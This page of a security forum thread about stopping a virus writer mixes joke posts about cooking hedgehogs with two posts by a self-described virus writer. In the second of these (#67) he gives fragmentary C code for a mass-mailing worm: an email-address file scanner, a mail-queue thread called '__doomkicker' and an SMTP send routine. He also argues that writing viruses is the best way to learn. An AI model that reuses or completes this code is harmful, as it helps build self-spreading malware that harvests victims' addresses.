Stopping a Virus Writer - Page 7
Page 7 of 7 FirstFirst ... 567
Results 61 to 68 of 68

Thread: Stopping a Virus Writer

  1. #61
    Regal Making Handler
    Join Date
    Jun 2002
    Posts
    1,668
    Can you eat them?
    Yes smoother them with clay and dump in a fire to bake. After a suitable cook time remove from fire. Break open the clayball. The spines should stay attached to the clay leaving you with some cooked meat. By the way, there was, a few years back a hedhog flavoured crisp on the market over hear. Not real just a gimick.
    What happens if a big asteroid hits the Earth? Judging from realistic simulations involving a sledge hammer and a common laboratory frog, we can assume it will be pretty bad. - Dave Barry

  2. #62
    They call me the Hunted foxyloxley's Avatar
    Join Date
    Nov 2003
    Location
    3rd Rock from Sun
    Posts
    2,528
    After a suitable cook time
    You've got to let them stop SQUEALING first
    55 - I'm fiftyfeckinfive and STILL no wiser,
    OLDER yes
    Beware of Geeks bearing GIF's
    come and waste the day :P at The Taz Zone

  3. #63
    T̙͓̞̣̯ͦͭͅͅȂͧͭͧ̏̈͏̖̖Z̿ ͆̎̄
    Join Date
    Dec 2004
    Posts
    3,171
    Hi DjM,

    A hedgehog is one of those little creatures that rolls up into a ball to daffle his enemies...a spiney ball kinda like velcro but with pins instead of velcro hooks...

    Hi jinxy,

    First you have to slice open the soft underbelly and remove the guts or the meat will get infected and taste nasty...other than that....Yummmmmmm! Anybody got a toothpick ! Do they have recipies on their website too?

    Hi foxyloxley,

    Geeeeezzzz!...that sounds soooooo cruel to cook it while it's still alive....you have to beat it unconscious first with a rock to tenderize it...then cook it ! Sheeeeeesh !


    Eg


  4. #64

    Cool

    I'm a older virus writter, and some for my virus don't run actually, but i don't understand for malicious virus writters who send a virus only for molest or appear in papers.

    Basically this area is "vudu" for all coders, and i have interesting and exciting! Actually i write some and dangerous virus codes, the difference is i study that, i don't interest be famous.

    Now, some virus propagation cause millions in lost for some some some enterprises, that is true? or is a leyend only.

    Many AV enterprises take a virus for a good business, it is true, they send a hive ( virus egg) and infect millions of pc around the world two days later they release a removal tool ), when a independient virus coder send a hive, then he is persecute, ironic? yes.


    Now with respect to the original post, and Tindala post, the problem reside onto kernell, the traditional AV don't detect this virus, why, simple: the code "delta" on the ZERO ring kernell level and the AV don't see that.

    Some virus implement himself protocols like a tcp, like a smtp and others.


    Diagnostic:

    Lost of memory ( and virtual memory)
    Low processing task
    Malfunction in some kernell objects (freeze system and panic [under linuz])
    Rare and don't listed port traffic (open ports etc)
    A "idiot" or "suck.." bad intentioned messages on the screen (no system form objects)
    lost of information ( encrypted data and corrupt files)
    Dennied root acces or administrator (windows)
    Dennied users acces


    Solution:

    in the pack of process:
    - First: a traffic scanner
    - Second:a memory scanner (background process and high objects registration) like a spy
    -Third: a comercial AV

    then, a expertise coder who use this tools and hunt the non-comecial virus.

    Yes, this is only a idea, very difficult but this works only if you don't decide reinstall or recompile the bynaries for kernell system. Or reinstall the system (data server, web server etc)


    What is it?

    A difficult way, but the secure way for take off a rare no-comercial virus.



    Saludos

  5. #65
    Banned
    Join Date
    Sep 2005
    Posts
    12
    firewalls and a/vs usually work, but if they come out with new ones everyday, how do we stop them? do..we merely learn from them? and send their attacks back at them? merely for defensive purposes of course. or do we let them keep attacking poor innocent people.? =(

  6. #66
    Senior Member
    Join Date
    Jul 2003
    Posts
    634
    Now, I couldnt be arsed reading the entire 7 pages (Sorry im wasted...) of this thread, but I was just wondering why you think he's writing them? could he not just be using a virus creation kit? - AV's will pick these up.

    What does the "virus" do?

    lalalala

    i2c

  7. #67
    Originally posted here by i2c
    Now, I couldnt be arsed reading the entire 7 pages (Sorry im wasted...) of this thread, but I was just wondering why you think he's writing them? could he not just be using a virus creation kit? - AV's will pick these up.

    What does the "virus" do?

    i2c
    Yes, good question, i write a Creation Kit for polimorphic variants, assembler, c++ etc, but the problem with that is:

    a virus writter is alone person, underground person, actually i don't. I consider myself for a newbie in virus writting. I learn day by day. But my point in this ask (my ask) is take a lot of my experience in virus creation, virus design for help. i don't say why i decide take this way, help for persons? anyway in the past, now i learn for take the live "happyness" . Suicidal boy? maybe but i learn for the "coding virus" that for malicious code is the wrong way, only i have the necesary weapons for live the obfuscated coding in peace and better.


    You see, write a virus code is no a difficult task only you need know how the operating system works.

    we have a piece of code:

    a simple scanner

    /\
    < >
    \/

    Code:
    char file_parser(const char *filename)
    {
    	HANDLE __file__; //operator HANDLE( ) const throw( ) rEturns the value of the stored handle (ALT)
    	DWORD __offset__, __heap__, __finder__; //operator DWORD( ) const rEturns the cookie associated with the CComGITPtr object (ALT)
    	char buf[65535]; // for take a lot of memoRy 
    
    	__file__ = CreateFile(filename, FILE_SHARE_READ, FILE_SHARE_READ|FILE_SHARE_WRITE,
    		NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED, NULL); // rEturns a handle that can be used to access the object
    	if (__file__ == NULL || __file__ == INVALID_HANDLE_VALUE) return 1; // i donT need explaiN thiS
        //Like a linuz hd0 equal \\.\PHYSICALDRIVE0                  
    	__heap__ = 0;
    	__finder__ = 0;
    	for (;;) { // wE dont't need run
    		__offset__ = 0; // how we move how we ask onto buFFer  
    		ReadFile(__file__, buf, sizeof(buf)-2, &__offset__, NULL); // WhY -2 for the first (no last) unsigned int
    		if (__offset__ == 0 || __offset__ >= sizeof(buf)) break; 
    		__heap__ += __offset__;
    		buf[__offset__] = 0;
    
    		scantext_textcvt(buf, __offset__); //search for "any" stuff do you WaNT
    		__finder__ += scantext_extract_ats(buf, __offset__);
    
    		if ((__finder__ == 0) && (__heap__ > (300*1024))) // really i want a any patrol, no a specific patrol, you see
    			//if you take a moment for see .EXE and .dll (object) code you learn by the time why is a reall patrol in
    			//some windows or linuz objects
    			break;
    	}
    	CloseHandle(__file__); // close the "stream"
    	return 0;
    }
    
    
    If you want send that for mail packets is very simple:
    
    the difficult way:
    
    // queueing for mail transfer packets
    
    static DWORD _stdcall __doomkicker(LPVOID _flag)
    {
    	struct _MAILPROTOCOL_CLS *_MTQ = (struct _MAILPROTOCOL_CLS *)_flag;
    	InterlockedIncrement(&mythread); // increments the value of the specified variable 
    	if (_MTQ != NULL) {
    		_MTQ->_state = 1;
    		mmsender(_MTQ);
    		_MTQ->_state = 2;
    	}
    	if (mythread > 0)
    		InterlockedDecrement(&mythread); //mythread is the idle for asyncronous sender
    	ExitThread(0); // <:)
    	return 0; // zero determine the way for the thread heap
    }
    
    the _MAILPROTOCOL_CLS if you preffer..a simple dynamic list
    
    #pragma pack(push, 1)
    struct _MAILPROTOCOL_CLS {
    	struct _MAILPROTOCOL_CLS *next;
    	unsigned long tick_got;
    	char _state;		
    	char priority;		
    	char to[1];
    };
    
    
    the easy way:
    
    prototypes
    
    #define BUFFER_DEFAULT_SIZE 4096
    
    #define TIME_STAMP_YES 0
    #define TIME_STAMP_NO 1
    #define STR_VALUE 0
    #define DW_VALUE 1
    #define REG_BUFF 100
    
    
    structures:
    
    typedef struct
    {
       char* ToAdd;
       char* FromAdd;
       char* Subject;
       char* MsgBody;
    }SmtpMsg;
    
    typedef struct
    {
       char* address;
       int port;
    }TCPServer;
    
    static FILE *logFile;
    
    char* getNowTime (void)
    {
       struct tm *nowTime;
       time_t aclock;
    
       time (&aclock);
       nowTime = localtime (&aclock);
    
       return asctime(nowTime);
    }
    
    
    //principal module (sender)
    
    bool sendData (const char* msg, SOCKET sockInUse, char* rcvBuff)
    {
       const char* MSG;
       int ret;
    
       ZeroMemory (rcvBuff, BUFFER_DEFAULT_SIZE);
       MSG = msg;
    
       size_t msgLength;
       msgLength = strlen(MSG);
    
       send (sockInUse, MSG, msgLength, 0);
        ret = recv (sockInUse, rcvBuff, BUFFER_DEFAULT_SIZE, 0);
    
       if (ret != 0)
          if (ret == SOCKET_ERROR)
             printf("Connection to SMTP server is now OK" + WSAGetLastError());
    
        return true;
    }
    
    
    ZeroMemory:
    
    The ZeroMemory macro fills a block of memory with zeros.
    
    To avoid undesired effects of optimizing compilers, use the SecureZeroMemory function.
    
    
    if you don't know what is the ZeroMemory prototype
    
    void ZeroMemory(
      PVOID Destination,
      SIZE_T Length
    );
    
    Parameters
    Destination 
    [in] Pointer to the starting address of the block of memory to fill with zeros. 
    Length 
    [in] Size of the block of memory to fill with zeros, in bytes. 
    Return Values
    This function has no return value.
    
    if you don't have idea for send is declared:
    
    int PASCAL FAR send (
                         IN SOCKET s,
                         IN const char FAR * buf,
                         IN int len,
                         IN int flags);
    
    part of winsock.h

    Now, the virus creation need more coding, this is only the first way o any way, really i confused sometimes
    what is the better way for attack a virus code (coding) the virus creation tools is the most simple way for
    kids and childrens, I take a moment for write asm virus or C trojan horse, but i repeat:

    The virus is a better way for learn?

    I say yes, all of virus including is a "expertise" knowing for Operating Systems and hardware functionally..

    I don't need morality for see malicious coders like a child molesters, that childrens is the future for the real
    underground and professional coders. But, this childrens, like me (along time ago) need someone who teach the
    only way: best softare, best operating systems (pleasseeee), best games and best persons (machines any..)


    Saludos i2c and BesT WisheS

    AzRaEL [NuKE]

    /\
    < >
    \/

  8. #68
    Senior Member
    Join Date
    Jul 2003
    Posts
    634
    Yea interesting post, I understand the process of creation, any one that mucks about with code and OS's i believe has the knowledge to do some damaging things. I just wanted to learn more about this persons problem as he was very vague on details!

    You seem like the majority of us here at AO, interested in "black arts" but to many morals to use them to cause harm...

    Cheers for the post

    i2c

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •